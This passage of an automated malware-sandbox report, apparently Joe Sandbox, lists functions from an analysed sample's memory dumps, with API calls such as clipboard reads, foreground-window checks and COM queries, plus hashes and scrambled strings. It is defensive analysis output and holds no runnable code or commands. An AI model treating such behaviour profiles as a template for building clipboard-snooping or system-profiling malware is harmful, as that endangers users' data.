                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4063528623-0
                                                                                                                      • Opcode ID: 4b904843f2912ef21b4d41ff99f8c42d9af38dae692026d0fcf994d1a5cce5d5
                                                                                                                      • Instruction ID: 563979189fded2e0dd7d44b4c0e86fd2f19d8dda541e80245efeef63773d0d03
                                                                                                                      • Opcode Fuzzy Hash: 4b904843f2912ef21b4d41ff99f8c42d9af38dae692026d0fcf994d1a5cce5d5
                                                                                                                      • Instruction Fuzzy Hash: A5617C73B143140BD718AE7ADC1A36A76D39FC5310F0F853EA995EB791ED7888068385

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 38 522080-5220b2 LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      • LdrInitializeThunk.NTDLL(0052523A,?,00000018,?,?,00000018,?,?,?), ref: 005220AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 67 521b50-521ba6 68 521bb0-521c04 67->68 68->68 69 521c06-521c16 68->69 71 521816-52186f 69->71 72 521c1c 69->72 73 521870-5218c3 71->73 73->73 74 5218c5-5218d0 73->74 75 5218d3-5218d5 74->75 76 521800-521813 75->76 77 5218db-5218e0 75->77 76->71 77->67
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b006a5bedfd6e41db02808d1fc51827bae392cf4bf9f62673e5043eff8febfa3
                                                                                                                      • Instruction ID: 04ee806b9a09f5fb3155a2345b08bcdec28f08339d173b479a7f3c1bee33e22b
                                                                                                                      • Opcode Fuzzy Hash: b006a5bedfd6e41db02808d1fc51827bae392cf4bf9f62673e5043eff8febfa3
                                                                                                                      • Instruction Fuzzy Hash: 7141F0B64587118BD314CF10D89135BFAE3AFD6304F19CA1DE8C55B384DAB5C10A8B86

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 150 521816-52186f 151 521870-5218c3 150->151 151->151 152 5218c5-5218d0 151->152 153 5218d3-5218d5 152->153 154 521800-521813 153->154 155 5218db-521ba6 153->155 154->150 158 521bb0-521c04 155->158 158->158 159 521c06-521c16 158->159 159->150 161 521c1c 159->161
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6550d3913279a69f5389d0091dcb985c40984ec8ae160820b748a7f48e410ad1
                                                                                                                      • Instruction ID: 0231859c4c3ce178ae5061218e8a95355fa7953cc97fc802b933d86be0db9c7d
                                                                                                                      • Opcode Fuzzy Hash: 6550d3913279a69f5389d0091dcb985c40984ec8ae160820b748a7f48e410ad1
                                                                                                                      • Instruction Fuzzy Hash: 8B11BE751593018BD318CF64E8D136BFAA3AFD6348F18892DE08557385CAB4C10A8B56

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 005223C5
                                                                                                                      • GetForegroundWindow.USER32 ref: 005223E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ForegroundWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2020703349-0
                                                                                                                      • Opcode ID: 2fccf93c7f4b00589a29aef56dbc52653fffb784ba26c0671cc618efe61df12b
                                                                                                                      • Instruction ID: 8476a6eabb27a58e1f03eccf84f08047285528a41fddc390c71b02e15b063d62
                                                                                                                      • Opcode Fuzzy Hash: 2fccf93c7f4b00589a29aef56dbc52653fffb784ba26c0671cc618efe61df12b
                                                                                                                      • Instruction Fuzzy Hash: 8FD0A7B58028114BE2559760BC4E47F3A21AFB72053044414E40B01656FB31119FDE9E

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 39 5204b0-5204c7 call 523770 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,004E8C27,FDFCE302), ref: 005204C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 55a074445ef61be0a8f6fb450b435f728a4e4652f8f076049a92f1836b47b3f2
                                                                                                                      • Instruction ID: 922dd129763f905e5854e6b869f90d4b3a588992078e6315a234ab5d17d4e868
                                                                                                                      • Opcode Fuzzy Hash: 55a074445ef61be0a8f6fb450b435f728a4e4652f8f076049a92f1836b47b3f2
                                                                                                                      • Instruction Fuzzy Hash: 4AC04871045121BACE102B24FC09BCA3E68EF96262F068096B004A61B18660AD829A94

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 42 522000-522011 call 523750 FreeLibrary
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNELBASE(004E8D05), ref: 0052200B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
                                                                                                                      • API String ID: 0-299570860
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
                                                                                                                      • API String ID: 0-1873956536
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxP$qVol$s@qF$wDuJ${HyN$jh$nl$zx
                                                                                                                      • API String ID: 0-1851612794
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0051D572
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051D608
                                                                                                                      • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0051D646
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051D6A8
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051D765
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0051D7D6
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0051DB5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
                                                                                                                      • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                                                                      • API String ID: 2895375541-1972840126
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$*$7$>gVf$TW$WH$X2c0$ruO$}&'$
                                                                                                                      • API String ID: 0-2009591350
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$6y$YjM$YjM$fjM$fjM$pSlM$yx$y~${
                                                                                                                      • API String ID: 0-3274899816
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$&$5$A$J$t
                                                                                                                      • API String ID: 0-1619763526
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                                                                      • API String ID: 0-3323421312
                                                                                                                      • Opcode ID: 4b2e3b170f9843f770f718cf3cb09b460eaeb694b777f33e9bccdffa6f9f90df
                                                                                                                      • Instruction ID: c643c7cb93e478496918974cd00348dbc19cac6e1519763270fc898ceedf842b
                                                                                                                      • Opcode Fuzzy Hash: 4b2e3b170f9843f770f718cf3cb09b460eaeb694b777f33e9bccdffa6f9f90df
                                                                                                                      • Instruction Fuzzy Hash: 06D1147150C3818BD724CF2A849436BFBE2EFD1709F18896DE4E45B385D779890A8B87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                                                                      • API String ID: 0-1466227541
                                                                                                                      • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                                      • Instruction ID: 35937991343beb03a5ecdb9d7bb5f856f1a6363c8d0b7a50fe11a8ee5fe279f6
                                                                                                                      • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                                      • Instruction Fuzzy Hash: 2371F27158C3C28AD3118F7AC4A076BFFE09FA2351F1C496DE4D44B382D37989099B9A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Uninitialize
                                                                                                                      • String ID: RYZ[$UGC9$Zb$c[i!$yR
                                                                                                                      • API String ID: 3861434553-210946138
                                                                                                                      • Opcode ID: 418428d24bd5ac4c64d9e9f2e00c578d25f795fa750c531a236eba7d510f3bfc
                                                                                                                      • Instruction ID: a11b328ce862a72d314a7c71782f6199bb733fd58bc7f09db60c28d5c7bb2d77
                                                                                                                      • Opcode Fuzzy Hash: 418428d24bd5ac4c64d9e9f2e00c578d25f795fa750c531a236eba7d510f3bfc
                                                                                                                      • Instruction Fuzzy Hash: 9EC1FF7150C3D08BDB348F26D4683ABBBE1AFE2305F08496DD8D95B386D778450ACB96
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0050A8F7
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0050A9CF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: *$*$q
                                                                                                                      • API String ID: 237503144-4001757600
                                                                                                                      • Opcode ID: 9a0f6172832833ec89b45c834c884d884f7dae40e4d4b1d760d07a957f41dd4b
                                                                                                                      • Instruction ID: 4dc7b0a04a3e52e70ba1e40cdfd26659a99c73c995bb1ae1a7a2b17bcb4f8204
                                                                                                                      • Opcode Fuzzy Hash: 9a0f6172832833ec89b45c834c884d884f7dae40e4d4b1d760d07a957f41dd4b
                                                                                                                      • Instruction Fuzzy Hash: 7D02E3B26083158FD724CF24D89136FBBE1FFD5304F158A2DE5998B291DB74990ACB82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID: !@$,$0$6$p$q$v
                                                                                                                      • API String ID: 1279760036-585546663
                                                                                                                      • Opcode ID: f57ca701dc81e82b44fea541e58da61511de0fe11aee4d434a5e18e733c8921b
                                                                                                                      • Instruction ID: 4b235f2b4281697abd1abe3c964af065c66651c444c7cf58f7af3132789d8982
                                                                                                                      • Opcode Fuzzy Hash: f57ca701dc81e82b44fea541e58da61511de0fe11aee4d434a5e18e733c8921b
                                                                                                                      • Instruction Fuzzy Hash: BC22DC7160C7818BD3249B28C49936EBFE1BBC5324F188A2DE5EA873D1D7798845CB47
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                                                                                                      • API String ID: 0-2829372548
                                                                                                                      • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                                                                      • Instruction ID: 3794566ec680aa9b741a0d49edef423271a06223b028f4fc5b2a3a984a9c4aef
                                                                                                                      • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                                                                      • Instruction Fuzzy Hash: BED1E2B160C7D18BD729CF29845136BBBE1AF97314F0889AED0D58B382DA3D8909C756
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EVA^$UJVM$VW$]NGD$b$~9$yR
                                                                                                                      • API String ID: 0-3900434141
                                                                                                                      • Opcode ID: bf9b89a3dc64eafc51fc561be2a5340904c5020895b983a421964d81f63871af
                                                                                                                      • Instruction ID: 5585a1dd00a947e91706c75a25321cb6199bd5d65ebac192a7ea3fb1860bf110
                                                                                                                      • Opcode Fuzzy Hash: bf9b89a3dc64eafc51fc561be2a5340904c5020895b983a421964d81f63871af
                                                                                                                      • Instruction Fuzzy Hash: 5AE1D2B15083808BD724CF25C8947ABBBE5FF95308F08892DE1D99B392DB798509CB56
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1006321803-0
                                                                                                                      • Opcode ID: 3e7a58182ace4d10c3b20726ad97e29be3b83721a356b7cb6e84f8d308346dcf
                                                                                                                      • Instruction ID: 3d7d6a7059907db70ae1072359b28edc33da9419f7efb965625b8c1609d22698
                                                                                                                      • Opcode Fuzzy Hash: 3e7a58182ace4d10c3b20726ad97e29be3b83721a356b7cb6e84f8d308346dcf
                                                                                                                      • Instruction Fuzzy Hash: 3B41697150C7858EE300AF7C84593AEBFE1AF96304F084D6DE4D586282E779868DD7A3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >$A$O$f$g$j$q
                                                                                                                      • API String ID: 0-654885204
                                                                                                                      • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                                                                      • Instruction ID: 36ca4a41951c767f4b7fa146fbd2baf6afaaca225ceda9c57ea3177b0ab399e9
                                                                                                                      • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                                                                      • Instruction Fuzzy Hash: FCD10733A4C7D04AE324853C885539BAED26BE2334F1D8B7DE9F5873C6D66A88458353
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Gt$J[$LUC_$we`k$x}{z$|A
                                                                                                                      • API String ID: 0-4062276182
                                                                                                                      • Opcode ID: 5242b20db249374f548befd3ae388d387b4cce62a5eb374f32c09aa2170ae452
                                                                                                                      • Instruction ID: d69f25f24b46313ff919967e1bc14435f9d3ac20fe62aa1e68cd5bd0bb42d75c
                                                                                                                      • Opcode Fuzzy Hash: 5242b20db249374f548befd3ae388d387b4cce62a5eb374f32c09aa2170ae452
                                                                                                                      • Instruction Fuzzy Hash: 930210B69083508BD3209F25D84576FBBE2FFD6318F054A6CE5C84B391DB75980ACB82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                      • API String ID: 0-3469842109
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 50$DM_e$FwPq$Js$'!
                                                                                                                      • API String ID: 0-1711485358
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 004F9FF7
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 004FA039
                                                                                                                        • Part of subcall function 00522080: LdrInitializeThunk.NTDLL(0052523A,?,00000018,?,?,00000018,?,?,?), ref: 005220AE
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary$InitializeThunk
                                                                                                                      • String ID: mj
                                                                                                                      • API String ID: 764372645-1022201683
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00505743
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 67
                                                                                                                      • API String ID: 237503144-1886922373
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00505E98
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00505F24
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 23
                                                                                                                      • API String ID: 237503144-326707096
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00509C9A
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 67
                                                                                                                      • API String ID: 237503144-1886922373
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00509C9A
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: 67
                                                                                                                      • API String ID: 237503144-1886922373
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #C}$@-$up$vC
                                                                                                                      • API String ID: 0-3794437364
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PWPQ$bd\,$fnga$oQ
                                                                                                                      • API String ID: 0-3706350231
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 67$J$u$wq
                                                                                                                      • API String ID: 0-4028943437
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: S"(w$S"(w$f
                                                                                                                      • API String ID: 2994545307-891790955
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
